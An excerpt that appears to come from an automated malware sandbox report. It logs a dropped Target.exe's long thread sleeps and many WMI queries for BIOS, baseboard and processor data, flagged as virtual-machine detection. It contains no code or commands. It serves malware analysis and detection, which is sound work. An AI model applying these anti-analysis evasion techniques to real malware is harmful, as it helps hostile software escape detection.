Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -599886s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -599777s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59867s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -119500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59640s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59529s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59407s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59287s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -598871s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -598761s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -598652s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59840s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59733s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59625s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59516s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59379s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59261s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -597708s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -597543s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59859s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7920	Thread sleep time: -30000s >= -30000s

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\Desktop\zlONcFaXkc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\Desktop\zlONcFaXkc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
